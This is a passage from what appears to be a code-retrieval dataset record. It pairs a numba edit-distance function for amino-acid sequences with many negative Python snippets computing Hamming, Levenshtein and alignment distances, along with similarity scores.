\"threshold\": THRESHOLD,\n \"ignore_index\": ignore_index,\n \"multidim_average\": multidim_average,\n \"average\": average,\n },\n )", "def calc_dist_matrix(self):\n\n self.dist_matrix = spatial.distance.squareform(spatial.distance.pdist(self.data_vector,metric=\"hamming\"))\n\n self.dist_frame = pd.DataFrame(self.dist_matrix,\n index = self.seq_strings,\n columns = self.seq_strings)", "def HammingDistance(array1, array2, normed=False):\n # 0) PREPARE FOR CALCULATIONS\n # 0.1) Convert the arrays into rank-1 arrays\n if len(np.shape(array1)) > 1:\n array1 = array1.reshape(-1)\n if len(np.shape(array2)) > 1:\n array2 = array2.reshape(-1)\n\n # 0.2) Security check\n if len(array1) != len(array2):\n raise ValueError( \"Arrays are not aligned\" )\n\n # 1) COUNT THE NUMBER OF COINCIDENCES\n similarity = (array1 == array2)\n n_equal = similarity.sum()\n\n # 2) COMPUTE THE HAMMING DISTANCE\n length = len(array1)\n h_dist = 1. - float(n_equal) / length\n\n # 3) RETURN RESULT ACCORDING TO OPTIONS\n # Standard Hamming distance\n if not normed:\n return h_dist\n\n # Normalized Hamming distance\n else:\n # Count the number of ones in the two arrays\n n_1 = len(array1.nonzero()[0])\n n_2 = len(array2.nonzero()[0])\n\n # Estimate the expected number of random coincidences\n exp_nc = 1.0 / length * (n_1 * n_2 + (length - n_1) * (length - n_2))\n\n # The expected Hamming distance\n exp_hdist = 1.0 - exp_nc / float(length)\n\n return h_dist, exp_hdist", "def distance_matrix(dnas: Collection[str], metric=hamming_distance, relative=True, as_ndarray=False):\n n = len(dnas)\n result = [[0] * n for _ in range(n)]\n for pair in itertools.combinations(zip(range(n), dnas), r=2):\n (idx1, dna1), (idx2, dna2) = pair\n distance = metric(dna1, dna2)\n distance = distance / max(len(dna1), len(dna2)) if relative else distance\n result[idx1][idx2] = distance\n result[idx2][idx1] = distance\n if as_ndarray:\n result = np.asarray(result)\n return result", "def _calc_distance(hmm1, hmm2, seqs2):\n p12 = hmm1.calc_loglikelihood(seqs2)\n p22 = hmm2.calc_loglikelihood(seqs2)\n # calc total number of elements in all sequences\n # TODO: consider the case when number of elements vary from seq to seq\n n_elements = len(seqs2) * len(seqs2[0])\n return (p22 - p12) / n_elements", "def hamming2(s1, s2):\n assert len(s1) == len(s2)\n return sum(c1 != c2 for c1, c2 in zip(s1, s2))" ]
[ "0.63828456", "0.6093228", "0.6056598", "0.59507614", "0.5795671", "0.578761", "0.57800555", "0.574706", "0.5681204", "0.56678975", "0.56452966", "0.56424135", "0.563103", "0.558626", "0.55659384", "0.5539205", "0.5504324", "0.5493676", "0.5407647", "0.5401868", "0.53662705", "0.53654534", "0.5331345", "0.531185", "0.52777064", "0.5271174", "0.52624714", "0.5231668", "0.52188754", "0.52121013", "0.52088666", "0.51912147", "0.5184641", "0.5168403", "0.5156907", "0.51552004", "0.5152715", "0.515053", "0.51418227", "0.51345557", "0.5130021", "0.5129344", "0.5128419", "0.5120421", "0.5118085", "0.5110736", "0.510915", "0.5102084", "0.5101705", "0.5098284", "0.50893307", "0.50761753", "0.50629693", "0.5052477", "0.505048", "0.5042786", "0.50333846", "0.50303316", "0.5023169", "0.49914676", "0.49841696", "0.4982956", "0.49769104", "0.49577573", "0.4948606", "0.49465325", "0.4940728", "0.4937117", "0.49331373", "0.4921258", "0.49147186", "0.4910327", "0.49098286", "0.48963428", "0.4896132", "0.4895852", "0.48935443", "0.48882863", "0.48854056", "0.48761764", "0.48714405", "0.48676166", "0.4866737", "0.4857286", "0.48528442", "0.48522636", "0.4847789", "0.48438883", "0.48358694", "0.48213464", "0.48182982", "0.4807429", "0.47937202", "0.47930557", "0.4792314", "0.47862038", "0.4785764", "0.47854355", "0.47831994", "0.4782779" ]
0.6753979
0
Computes the Levenshtein edit distance between two sequences, with the AA substitution distances provided in distance_matrix. The default distance matrix has a 1 for mismatches and 0 for matches.
def nb_editdistance(seq_vec1, seq_vec2, distance_matrix=identity_nb_distance_matrix, gap_penalty=1): q_L = seq_vec1.shape[0] s_L = seq_vec2.shape[0] if q_L == s_L: """No gaps: substitution distance This will make it differ from a strict edit-distance since the optimal edit-distance may insert same number of gaps in both sequences""" dist = 0 for i in range(q_L): dist += distance_matrix[seq_vec1[i], seq_vec2[i]] return dist ldmat = np.zeros((q_L, s_L), dtype=np.int16) for row in range(1, q_L): ldmat[row, 0] = row * gap_penalty for col in range(1, s_L): ldmat[0, col] = col * gap_penalty for col in range(1, s_L): for row in range(1, q_L): ldmat[row, col] = min(ldmat[row-1, col] + gap_penalty, ldmat[row, col-1] + gap_penalty, ldmat[row-1, col-1] + distance_matrix[seq_vec1[row-1], seq_vec2[col-1]]) # substitution return ldmat[row, col]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def word_embedding_levenshtein(seq1, seq2, embeddings, average_distance, r=0.9, normalise=False):\n\tx1 = 1 + len(seq1)\n\tx2 = 1 + len(seq2)\n\n\talpha = r / ((1 - r) * average_distance)\n\n\t# Initialisation of the matrix\n\td = [] # Using Numpy structures for this is probably not more efficient\n\td.append(list(range(x2)))\n\tfor i in range(1, x1):\n\t\td.append([i] * x2)\n\n\t# Core of the algorithm\n\tfor i in range(1, x1):\n\t\tfor j in range(1, x2):\n\t\t\te1 = seq1[i-1]\n\t\t\te2 = seq2[j-1]\n\n\t\t\tif(e1 == e2): c = 0\n\t\t\telse:\n\t\t\t\tv1 = embeddings[e1]\n\t\t\t\tv2 = embeddings[e2]\n\n\t\t\t\tif((v1 is None) or (v2 is None)): c = 1\n\t\t\t\telse:\n\t\t\t\t\tdst = np.linalg.norm(v1 - v2) # Distance 2 (or L2 norm of the difference)\n\n\t\t\t\t\t# Now, we need a function increasing function mapping 0 to 0 and +inf to 1\n\t\t\t\t\tc = 1 - (1 / (1 + (alpha * dst)))\n\n\t\t\t\t\t#c /= r # If you uncomment this line, the cost of a substitution at distance `average_distance` will be 1 and substitutions might have higher cost, up to 1/r. This might be justified as long as `r` is above 0.5 (otherwise, some substitutions might be more expensive than an insertion followed by a deletion).\n\n\t\t\td[i][j] = min(\n\t\t\t\t(d[(i-1)][j] + 1), # Deletion of seq1[i]\n\t\t\t\t(d[i][(j-1)] + 1), # Insertion of seq2[j]\n\t\t\t\t(d[(i-1)][(j-1)] + c) # Substitution from seq1[i] to seq2[j]\n\t\t\t)\n\n\traw = d[-1][-1]\n\n\tif(normalise): return (raw / (len(seq1) + len(seq2)))\n\treturn raw", "def levenshteinDistance(s1, s2):\n singleLetterMapping = {DOWNLEFT: '1', DOWN:'2', DOWNRIGHT:'3',\n LEFT:'4', RIGHT:'6',\n UPLEFT:'7', UP:'8', UPRIGHT:'9'}\n\n len1 = len([singleLetterMapping[letter] for letter in s1])\n len2 = len([singleLetterMapping[letter] for letter in s2])\n\n matrix = list(range(len1 + 1)) * (len2 + 1)\n for i in range(len2 + 1):\n matrix[i] = list(range(i, i + len1 + 1))\n for i in range(len2):\n for j in range(len1):\n if s1[j] == s2[i]:\n matrix[i+1][j+1] = min(matrix[i+1][j] + 1, matrix[i][j+1] + 1, matrix[i][j])\n else:\n matrix[i+1][j+1] = min(matrix[i+1][j] + 1, matrix[i][j+1] + 1, matrix[i][j] + 1)\n return matrix[len2][len1]", "def get_levenshtein_distance(a, b):\r\n n, m = len(a), len(b)\r\n if n > m:\r\n # Make sure n <= m, to use O(min(n,m)) space\r\n a, b = b, a\r\n n, m = m, n\r\n current_row = range(n+1) # Keep current and previous row, not entire matrix\r\n\r\n for i in range(1, m+1):\r\n previous_row, current_row = current_row, [i]+[0]*n\r\n for j in range(1, n+1):\r\n add, delete, change = previous_row[j]+1, current_row[j-1]+1, previous_row[j-1]\r\n if a[j-1] != b[i-1]:\r\n change += 1\r\n current_row[j] = min(add, delete, change)\r\n return current_row[n]", "def edit_distance_between_seqs(seq1, seq2):\n aln1, aln2 = needleman_wunsch(seq1, seq2)\n return edit_distance_from_aln_strings(aln1, aln2)", "def _nb_vector_editdistance(indices, seqs_mat, seqs_L, distance_matrix=identity_nb_distance_matrix, gap_penalty=1):\n assert seqs_mat.shape[0] == seqs_L.shape[0]\n mx_L = nb.int_(np.max(seqs_L))\n\n dist = np.zeros(indices.shape[0], dtype=np.int16)\n \n \"\"\"As long as ldmat is big enough to accomodate the largest sequence\n its OK to only use part of it for the smaller sequences\n NOTE that to create a 2D array it must be created 1D and reshaped\"\"\"\n ldmat = np.zeros(mx_L * mx_L, dtype=np.int16).reshape((mx_L, mx_L))\n for ind_i in nb.prange(indices.shape[0]):\n query_i = indices[ind_i, 0]\n seq_i = indices[ind_i, 1]\n \n q_L = seqs_L[query_i]\n s_L = seqs_L[seq_i]\n if q_L == s_L:\n \"\"\"No gaps: substitution distance\n This will make it differ from a strict edit-distance since\n the optimal edit-distance may insert same number of gaps in both sequences\"\"\"\n #tmp_dist = 0\n for i in range(q_L):\n dist[ind_i] += distance_matrix[seqs_mat[query_i, i], seqs_mat[seq_i, i]]\n #dist[ind_i] = tmp_dist\n continue\n \n \"\"\"Do not need to re-zero each time\"\"\"\n # ldmat = np.zeros((q_L, s_L), dtype=np.int16)\n for row in range(1, q_L):\n ldmat[row, 0] = row * gap_penalty\n\n for col in range(1, s_L):\n ldmat[0, col] = col * gap_penalty\n \n for col in range(1, s_L):\n for row in range(1, q_L):\n ldmat[row, col] = min(ldmat[row-1, col] + gap_penalty,\n ldmat[row, col-1] + gap_penalty,\n ldmat[row-1, col-1] + distance_matrix[seqs_mat[query_i, row-1], seqs_mat[seq_i, col-1]]) # substitution\n dist[ind_i] = ldmat[row, col]\n return dist", "def dameraulevenshtein(seq1, seq2):\n # codesnippet:D0DE4716-B6E6-4161-9219-2903BF8F547F\n # Conceptually, this is based on a len(seq1) + 1 * len(seq2) + 1 matrix.\n # However, only the current and two previous rows are needed at once,\n # so we only store those.\n oneago = None\n thisrow = list(range(1, len(seq2) + 1)) + [0]\n for x in range(len(seq1)):\n # Python lists wrap around for negative indices, so put the\n # leftmost column at the *end* of the list. This matches with\n # the zero-indexed strings and saves extra calculation.\n twoago, oneago, thisrow = (oneago, thisrow, [0] * len(seq2) + [x + 1])\n for y in range(len(seq2)):\n delcost = oneago[y] + 1\n addcost = thisrow[y - 1] + 1\n subcost = oneago[y - 1] + (seq1[x] != seq2[y])\n thisrow[y] = min(delcost, addcost, subcost)\n # This block deals with transpositions\n if (x > 0 and y > 0 and seq1[x] == seq2[y - 1]\n and seq1[x - 1] == seq2[y] and seq1[x] != seq2[y]):\n thisrow[y] = min(thisrow[y], twoago[y - 2] + 1)\n return thisrow[len(seq2) - 1]", "def dameraulevenshtein(seq1, seq2):\n # codesnippet:D0DE4716-B6E6-4161-9219-2903BF8F547F\n # Conceptually, this is based on a len(seq1) + 1 * len(seq2) + 1 matrix.\n # However, only the current and two previous rows are needed at once,\n # so we only store those.\n oneago = None\n thisrow = list(range(1, len(seq2) + 1)) + [0]\n for x in range(len(seq1)):\n # Python lists wrap around for negative indices, so put the\n # leftmost column at the *end* of the list. This matches with\n # the zero-indexed strings and saves extra calculation.\n twoago, oneago, thisrow = (oneago, thisrow, [0] * len(seq2) + [x + 1])\n for y in range(len(seq2)):\n delcost = oneago[y] + 1\n addcost = thisrow[y - 1] + 1\n subcost = oneago[y - 1] + (seq1[x] != seq2[y])\n thisrow[y] = min(delcost, addcost, subcost)\n # This block deals with transpositions\n if (x > 0 and y > 0 and seq1[x] == seq2[y - 1]\n and seq1[x - 1] == seq2[y] and seq1[x] != seq2[y]):\n thisrow[y] = min(thisrow[y], twoago[y - 2] + 1)\n return thisrow[len(seq2) - 1]", "def dameraulevenshtein(self, seq1, seq2):\n # codesnippet:D0DE4716-B6E6-4161-9219-2903BF8F547F\n # Conceptually, this is based on a len(seq1) + 1 * len(seq2) + 1 matrix.\n # However, only the current and two previous rows are needed at once,\n # so we only store those.\n oneago = None\n thisrow = range(1, len(seq2) + 1) + [0]\n for x in xrange(len(seq1)):\n # Python lists wrap around for negative indices, so put the\n # leftmost column at the *end* of the list. This matches with\n # the zero-indexed strings and saves extra calculation.\n twoago, oneago, thisrow = oneago, thisrow, [0] * len(seq2) + [x + 1]\n for y in xrange(len(seq2)):\n delcost = oneago[y] + 1\n addcost = thisrow[y - 1] + 1\n subcost = oneago[y - 1] + (seq1[x] != seq2[y])\n thisrow[y] = min(delcost, addcost, subcost)\n # This block deals with transpositions\n if (x > 0 and y > 0 and seq1[x] == seq2[y - 1]\n and seq1[x-1] == seq2[y] and seq1[x] != seq2[y]):\n thisrow[y] = min(thisrow[y], twoago[y - 2] + 1)\n return thisrow[len(seq2) - 1]", "def levenshtein_distance(first, second):\n if len(first) > len(second):\n first, second = second, first\n if len(second) == 0:\n return len(first)\n first_length = len(first) + 1\n second_length = len(second) + 1\n distance_matrix = [range(second_length) for x in range(first_length)]\n for i in range(1, first_length):\n for j in range(1, second_length):\n deletion = distance_matrix[i-1][j] + 1\n insertion = distance_matrix[i][j-1] + 1\n substitution = distance_matrix[i-1][j-1]\n if first[i-1] != second[j-1]:\n substitution += 1\n distance_matrix[i][j] = min(insertion, deletion, substitution)\n\n return distance_matrix[first_length-1][second_length-1]", "def dameraulevenshtein(seq1, seq2):\n # Conceptually, this is based on a len(seq1) + 1 * len(seq2) + 1 matrix.\n # However, only the current and two previous rows are needed at once,\n # so we only store those.\n oneago = None\n thisrow = list(range(1, len(seq2) + 1)) + [0]\n for x in range(len(seq1)):\n # Python lists wrap around for negative indices, so put the\n # leftmost column at the *end* of the list. This matches with\n # the zero-indexed strings and saves extra calculation.\n twoago, oneago, thisrow = oneago, thisrow, [0] * len(seq2) + [x + 1]\n for y in range(len(seq2)):\n delcost = oneago[y] + 1\n addcost = thisrow[y - 1] + 1\n subcost = oneago[y - 1] + (seq1[x] != seq2[y])\n thisrow[y] = min(delcost, addcost, subcost)\n # This block deals with transpositions\n if (x > 0 and y > 0 and seq1[x] == seq2[y - 1]\n and seq1[x-1] == seq2[y] and seq1[x] != seq2[y]):\n thisrow[y] = min(thisrow[y], twoago[y - 2] + 1)\n return thisrow[len(seq2) - 1]", "def levenshtein_distance(s1,s2):\n\n\t\tif len(s1) < len(s2):\n\t\t\treturn Searcher.levenshtein_distance(s2, s1)\n\n\t\t# len(s1) >= len(s2)\n\t\tif len(s2) == 0:\n\t\t\treturn len(s1)\n\n\t\tprevious_row = range(len(s2) + 1)\n\t\tfor i, c1 in enumerate(s1):\n\t\t\tcurrent_row = [i + 1]\n\t\t\tfor j, c2 in enumerate(s2):\n\t\t\t\tinsertions = previous_row[j + 1] + 1 # j+1 instead of j since previous_row and current_row are one character longer\n\t\t\t\tdeletions = current_row[j] + 1 # than s2\n\t\t\t\tsubstitutions = previous_row[j] + (c1 != c2)\n\t\t\t\tcurrent_row.append(min(insertions, deletions, substitutions))\n\t\t\tprevious_row = current_row\n\t\t\n\t\treturn previous_row[-1]", "def edit_distance(str1, str2, reconstruct_answer=False, method=alignments.Levinshtein(),\n swap_case_on_mismatch=True):\n method = alignments.Levinshtein() if method is None else method\n return align(str1, str2, reconstruct_answer, method, swap_case_on_mismatch)", "def distance_matrix(sequences, substitution_mat):\n distance_mat = numpy.empty((len(sequences), len(sequences)), dtype='float')\n\n print(\"Building distance matrix\")\n # Get similarity score\n for i, seqA in enumerate(sequences):\n sys.stdout.write(\"\\r%.f%%\" % (float(i+1)/len(sequences)*100))\n sys.stdout.flush()\n for j, seqB in enumerate(sequences[i:], start=i):\n score = substitution_score(substitution_mat, seqA, seqB)\n distance_mat[i, j] = score\n distance_mat[j, i] = score\n print(\"\")\n # Set equal the diagonal\n diag_mini = numpy.min(distance_mat.diagonal())\n for i in range(len(sequences)):\n distance_mat[i, i] = diag_mini\n # Convert similarity score into a distance\n mini = numpy.min(distance_mat)\n maxi = numpy.max(distance_mat)\n return 1 - (distance_mat + abs(mini))/(maxi - mini)", "def string_edit_dist(str1, str2):\n sm = edit_distance.SequenceMatcher(a=str1, b=str2)\n return sm.distance()", "def levenshtein_distance(str1, str2):\n m = len(str1)\n n = len(str2)\n lensum = float(m + n)\n d = [] \n for i in range(m+1):\n d.append([i]) \n del d[0][0] \n for j in range(n+1):\n d[0].append(j) \n for j in range(1,n+1):\n for i in range(1,m+1):\n if str1[i-1] == str2[j-1]:\n d[i].insert(j,d[i-1][j-1]) \n else:\n minimum = min(d[i-1][j]+1, d[i][j-1]+1, d[i-1][j-1]+2) \n d[i].insert(j, minimum)\n ldist = d[-1][-1]\n ratio = (lensum - ldist)/lensum\n return {'distance':ldist, 'ratio':ratio}", "def test_matrix_distance(self):\n # note that the score matrix must contain 'diagonal' elements m[i][i]\n # to avoid failure when the sequences match.\n m = {\"U\": {\"U\": 0, \"C\": 1, \"A\": 5}, \"C\": {\"C\": 0, \"A\": 2, \"G\": 4}}\n self.assertEqual(self.RNA(\"UUUCCC\").matrix_distance(\"UCACGG\", m), 14)\n self.assertEqual(self.RNA(\"UUUCCC\").matrix_distance(\"\", m), 0)\n self.assertEqual(self.RNA(\"UUU\").matrix_distance(\"CAC\", m), 7)\n self.assertRaises(KeyError, self.RNA(\"UUU\").matrix_distance, \"CAG\", m)", "def find_edit_distance(string1,string2):\n M=zeros((len(string1)+1,len(string2)+1), dtype=int)\n for i in xrange(1,len(string1)+1):\n M[i][0]=i\n for j in xrange(1,len(string2)+1):\n M[0][j]=j\n for i in xrange(1,len(string1)+1):\n for j in xrange(1,len(string2)+1):\n if(string1[i-1]!=string2[j-1]):\n M[i][j] = min(M[i - 1][j] + 1, M[i][j - 1] + 1, M[i - 1][j - 1] + 1)\n else:\n M[i][j] = M[i - 1][j - 1]\n return M[len(string1)][len(string2)]", "def levenshtein(s1, s2):\n if len(s1) < len(s2):\n return levenshtein(s2, s1)\n\n # len(s1) >= len(s2)\n if len(s2) == 0:\n return len(s1)\n\n previous_row = range(len(s2) + 1)\n for i, c1 in enumerate(s1):\n current_row = [i + 1]\n for j, c2 in enumerate(s2):\n insertions = previous_row[j + 1] + 1 # j+1 instead of j since previous_row and current_row are one character longer\n deletions = current_row[j] + 1 # than s2\n substitutions = previous_row[j] + (c1 != c2)\n current_row.append(min(insertions, deletions, substitutions))\n previous_row = current_row\n \n return previous_row[-1]", "def _pairwise_dist(self,seq1,seq2):\n \n return jf.damerau_levenshtein_distance(str(seq1), str(seq2))", "def distances(a, b):\n # generating matrix\n matrix = [[(0, None) for x in range(len(b) + 1)] for y in range(len(a) + 1)]\n\n # base case\n for i in range(1, len(a) + 1):\n matrix[i][0] = (i, Operation.DELETED)\n for j in range(1, len(b) + 1):\n matrix[0][j] = (j, Operation.INSERTED)\n\n # fill in matrix with tuples (cost, operation)\n for i in range(1, len(a) + 1):\n for j in range(1, len(b) + 1):\n # edit distance algorithm\n # costs for deletion, insertion and substitution\n delete_cost = matrix[i - 1][j][0] + 1\n insert_cost = matrix[i][j - 1][0] + 1\n substitute_cost = matrix[i - 1][j - 1][0]\n if a[i - 1] != b[j - 1]:\n substitute_cost += 1\n\n # edit distance is min cost of deletion, insertion, substitution\n if delete_cost < insert_cost and delete_cost < substitute_cost:\n matrix[i][j] = (delete_cost, Operation.DELETED)\n elif insert_cost < substitute_cost:\n matrix[i][j] = (insert_cost, Operation.INSERTED)\n else:\n matrix[i][j] = (substitute_cost, Operation.SUBSTITUTED)\n\n return matrix", "def damerau_levenshtein_similarity(s1, s2):\n max_cost = max(len(s1), len(s2))\n\n if max_cost == 0:\n return 1.0\n\n return 1.0 - float(damerau_levenshtein_distance(s1, s2)) / max_cost", "def question7(seq_x, seq_y):\n \n diag_score = 2\n off_diag_score = 1\n dash_score = 0\n alphabet = \"abcdefghijklmnopqrstuvwxyz\"\n score_matrix = student.build_scoring_matrix(alphabet, diag_score, off_diag_score, dash_score)\n \n align_matrix = student.compute_alignment_matrix(seq_x, seq_y, score_matrix, True)\n score, align_x, align_y = student.compute_global_alignment(seq_x, seq_y, score_matrix, align_matrix)\n \n edit_distance = len(seq_x) + len(seq_y) - score\n \n print \"Edit distance: \" + str(edit_distance)\n print align_x\n print align_y", "def edit_distance_from_aln_strings(str1, str2):\n assert len(str1) == len(str2)\n edit_distance = 0\n in_gap = False\n\n for i, char1 in enumerate(str1):\n if char1 == \"-\" or str2[i] == \"-\":\n if not in_gap:\n in_gap = True\n edit_distance += 1\n else:\n in_gap = False\n\n if char1 != str2[i]:\n edit_distance += 1\n\n return edit_distance", "def levenshtein(seq1: str, seq2: str) -> int:\n if seq1 == \"\":\n return len(seq2)\n if seq2 == \"\":\n return len(seq1)\n if seq1[-1] == seq2[-1]:\n cost = 0\n else:\n cost = 1\n \n result = min([levenshtein(seq1[:-1], seq2) + 1,\n levenshtein(seq1, seq2[:-1]) + 1,\n levenshtein(seq1[:-1], seq2[:-1]) + cost ])\n return result", "def iterative_levenshtein(self, w1, d1, w2, d2):\n rows = len(w1) + 1\n cols = len(w2) + 1\n dist = [[0 for x in range(cols)] for x in range(rows)]\n # source prefixes can be transformed into empty strings\n # by deletions:\n for i in range(1, rows):\n dist[i][0] = i\n # target prefixes can be created from an empty source string\n # by inserting the characters\n for i in range(1, cols):\n dist[0][i] = i\n\n for col in range(1, cols):\n for row in range(1, rows):\n if w1[row - 1] == w2[col - 1]:\n cost = 0\n else:\n cost = 1\n dist[row][col] = min(dist[row - 1][col] + 1, # deletion\n dist[row][col - 1] + 1, # insertion\n dist[row - 1][col - 1] + cost) # substitution\n return dist[row][col] < 5", "def compute_l2_distance_matrix(features_queries, features_dataset):\n sx = np.sum(features_queries ** 2, axis=1, keepdims=True)\n sy = np.sum(features_dataset ** 2, axis=1, keepdims=True)\n\n return np.sqrt(-2 * features_queries.dot(features_dataset.T) + sx + sy.T)", "def nb_vector_editdistance(indices, seqs_mat, seqs_L, distance_matrix=identity_nb_distance_matrix, gap_penalty=1):\n #print(indices.shape)\n #print(seqs_mat.shape)\n #print(seqs_L.shape)\n return _nb_vector_editdistance(indices, seqs_mat, seqs_L, distance_matrix, gap_penalty)", "def weighted_levenshtein(seq1, seq2, weights, r=0.9, normalise=False):\n\tx1 = 1 + len(seq1)\n\tx2 = 1 + len(seq2)\n\n\talpha = r / ((1 - r) * average_distance)\n\n\t# Initialisation of the matrix\n\td = [] # Using Numpy structures for this is probably not more efficient\n\ttmp = 0.0\n\tfirst_line = [tmp]\n\tfor e in seq2:\n\t\ttmp += weights.get(e, 1)\n\t\tfirst_line.append(tmp)\n\td.append(first_line)\n\ttmp = 0\n\tfor e in seq1:\n\t\ttmp += weights.get(e, 1)\n\t\td.append([tmp] * x2)\n\n\t# Core of the algorithm\n\tfor i in range(1, x1):\n\t\tfor j in range(1, x2):\n\t\t\te1 = seq1[i-1]\n\t\t\te2 = seq2[j-1]\n\n\t\t\tw1 = weights.get(e1, 1)\n\t\t\tw2 = weights.get(e2, 1)\n\n\t\t\td[i][j] = min(\n\t\t\t\t(d[(i-1)][j] + w1), # Deletion of seq1[i]\n\t\t\t\t(d[i][(j-1)] + w2), # Insertion of seq2[j]\n\t\t\t\t(d[(i-1)][(j-1)] + (int(e1 != e2) * max(w1, w2))) # Substitution from seq1[i] to seq2[j]\n\t\t\t)\n\n\traw = d[-1][-1]\n\n\tif(normalise): return (raw / (d[0][-1] + d[-1][0]))\n\treturn raw", "def lev_dist(s1, s2):\n\n if s1 is None or s2 is None:\n return np.NaN\n if pd.isnull(s1) or pd.isnull(s2):\n return np.NaN\n\n # Create the similarity measure object\n measure = sm.Levenshtein()\n\n s1 = gh.convert_to_str_unicode(s1)\n s2 = gh.convert_to_str_unicode(s2)\n\n # Call the function to compute the distance measure.\n return measure.get_raw_score(s1, s2)", "def damerau_levenshtein_distance(s1, s2):\n\n utils.check_for_none(s1, s2)\n utils.check_for_type(str, s1, s2)\n\n # s1 = utils.unicode_normalize(s1)\n # s2 = utils.unicode_normalize(s2)\n\n n1, n2 = len(s1), len(s2)\n infinite = n1 + n2\n\n char_arr = defaultdict(int)\n dp = [[0] * (n2 + 2) for _ in range(n1 + 2)]\n\n dp[0][0] = infinite\n for i in range(0, n1 + 1):\n dp[i + 1][0] = infinite\n dp[i + 1][1] = i\n for i in range(0, n2 + 1):\n dp[0][i + 1] = infinite\n dp[1][i + 1] = i\n\n for i in range(1, n1 + 1):\n db = 0\n for j in range(1, n2 + 1):\n i1 = char_arr[s2[j - 1]]\n j1 = db\n cost = 1\n if s1[i - 1] == s2[j - 1]:\n cost = 0\n db = j\n\n dp[i + 1][j + 1] = min(dp[i][j] + cost,\n dp[i + 1][j] + 1,\n dp[i][j + 1] + 1,\n dp[i1][j1] + (i - i1 - 1) + 1 + (j - j1 - 1))\n char_arr[s1[i - 1]] = i\n\n return dp[n1 + 1][n2 + 1]", "def __levenshtein(a, b):\n\n n, m = len(a), len(b)\n if n > m:\n # Make sure n <= m, to use O(min(n,m)) space\n a, b = b, a\n n, m = m, n\n\n current = list(range(n + 1))\n for i in range(1, m + 1):\n previous, current = current, [i] + [0] * n\n for j in range(1, n + 1):\n add, delete = previous[j] + 1, current[j - 1] + 1\n change = previous[j - 1]\n if a[j - 1] != b[i - 1]:\n change = change + 1\n current[j] = min(add, delete, change)\n\n return current[n]", "def edit_distance(str1, str2):\r\n pass", "def levenshtein_dist(s1, s2, dele, add, sub):\n m = np.zeros((len(s1)+1, len(s2)+1), dtype=np.int)\n p = np.zeros((len(s1)+1, len(s2)+1), dtype=np.float)\n for i in range(len(s1)+1):\n m[i, 0] = i\n # compute probability for deletion\n if i == 0:\n p[i, 0] = 1\n else:\n ind = alphabet.index('@')\n p[i, 0] = p[i-1, 0] * dele[ind, alphabet.index(s1[i-1])]\n for j in range(len(s2)+1):\n # compute probability for insertion\n if j == 0:\n p[0, j] = 1\n else:\n prev_char = '@' if j == 1 else s2[j-2]\n p[0, j] = p[0, j-1] * add[alphabet.index(prev_char),\n alphabet.index(s2[j-1])]\n m[0, j] = j\n for i in range(1, 1+len(s1)):\n for j in range(1, len(s2)+1):\n if s1[i-1] == s2[j-1]:\n k = np.argmin([m[i-1, j] + 1, m[i, j-1] + 1, m[i-1, j-1]])\n if k == 0:\n # deletion\n m[i, j] = m[i-1, j] + 1\n prev_char = '@' if j == 1 else s2[j-2]\n p[i, j] = p[i-1, j] * dele[alphabet.index(prev_char), alphabet.index(s1[i-1])]\n elif k == 1:\n # insertion\n m[i, j] = m[i, j-1] + 1\n prev_char = '@' if j == 1 else s2[j-2]\n p[i, j] = p[i, j-1] * add[alphabet.index(prev_char), alphabet.index(s2[j-1])]\n else:\n # no mistake\n m[i, j] = m[i-1, j-1]\n p[i, j] = p[i-1, j-1]\n else:\n k = np.argmin([m[i-1, j] + 1, m[i, j-1] + 1, m[i-1, j-1] + 1])\n if k == 0:\n # deletion\n m[i, j] = m[i-1, j] + 1\n prev_char = '@' if j == 1 else s2[j-2]\n p[i, j] = p[i-1, j] * dele[alphabet.index(prev_char), alphabet.index(s1[i-1])]\n elif k == 1:\n # insertion\n m[i, j] = m[i, j-1] + 1\n prev_char = '@' if j == 1 else s2[j-2]\n p[i, j] = p[i, j-1] * add[alphabet.index(prev_char), alphabet.index(s2[j-1])]\n else:\n # substitution\n m[i, j] = m[i-1, j-1] + 1\n p[i, j] = p[i-1, j-1] * sub[alphabet.index(s1[i-1]), alphabet.index(s2[j-1])]\n # recall that in sub[X, Y], Y is the correct word\n\n return m[len(s1), len(s2)], p[len(s1), len(s2)]", "def edit_distance(s1, s2, transpositions=False):\r\n # set up a 2-D array\r\n len1 = len(s1)\r\n len2 = len(s2)\r\n lev = _edit_dist_init(len1 + 1, len2 + 1)\r\n\r\n # iterate over the array\r\n for i in range(len1):\r\n for j in range(len2):\r\n _edit_dist_step(lev, i + 1, j + 1, s1, s2, transpositions=transpositions)\r\n return lev[len1][len2]", "def matrix(sequence_a, sequence_b, match_score=3, gap_cost=2):\n\n # Everything that is not a match is a zero\n # Why do we make the length of the sequences longer?\n score_matrix = np.zeros((len(sequence_a) + 1, len(sequence_b) + 1), np.int)\n\n for i, j in itertools.product(range(1, score_matrix.shape[0]), range(1, score_matrix.shape[1])):\n # add match_score if the previous elements in the sequences match else subtract match_score\n match = score_matrix[i - 1, j - 1] \\\n + (match_score if sequence_a[i - 1] == sequence_b[j - 1] else - match_score)\n # subtract the gap_cost - insertions/deletions depends on which\n # is the source and which is the target sequence\n delete = score_matrix[i - 1, j] - gap_cost\n insert = score_matrix[i, j - 1] - gap_cost\n # Insert the highest score as the value for the traceback\n score_matrix[i, j] = max(match, delete, insert, 0)\n return score_matrix", "def edit_distance_dp(str1, str2):\n rows = len(str1) + 1\n cols = len(str2) + 1\n dp_table = [[0 for j in range(cols)] for i in range(rows)]\n for row in range(rows):\n for col in range(cols):\n if row == 0 or col == 0:\n dp_table[row][col] = max(row, col)\n else:\n if str1[row - 1] == str2[col - 1]:\n dp_table[row][col] = dp_table[row - 1][col - 1]\n else:\n replace = dp_table[row - 1][col - 1]\n insert = dp_table[row][col - 1]\n delete = dp_table[row - 1][col]\n dp_table[row][col] = min(replace, insert, delete) + 1\n \n return dp_table[rows-1][cols-1]", "def _levenshtein_distance(t1: Trace, t2: Trace):\n if t1.length > t2.length:\n t1, t2 = t2, t1\n\n distances = range(t1.length + 1)\n for i2, c2 in enumerate(t2.event_list):\n distances_ = [i2 + 1]\n for i1, c1 in enumerate(t1.event_list):\n if c1 == c2:\n distances_.append(distances[i1])\n else:\n distances_.append(1 + min((distances[i1], distances[i1 + 1], distances_[-1])))\n distances = distances_\n return distances[-1]", "def seq_align(string1,string2,mismatch_penalty,gap_penalty):\n\n # define 2x2 matrix\n matrix = []\n for i in range(len(string1)+1):\n if i == 0:\n matrix.append(list([gap_penalty * x for x in range(len(string2)+1)]))\n else:\n matrix.append(list([gap_penalty * i if x == 0 else None for x in 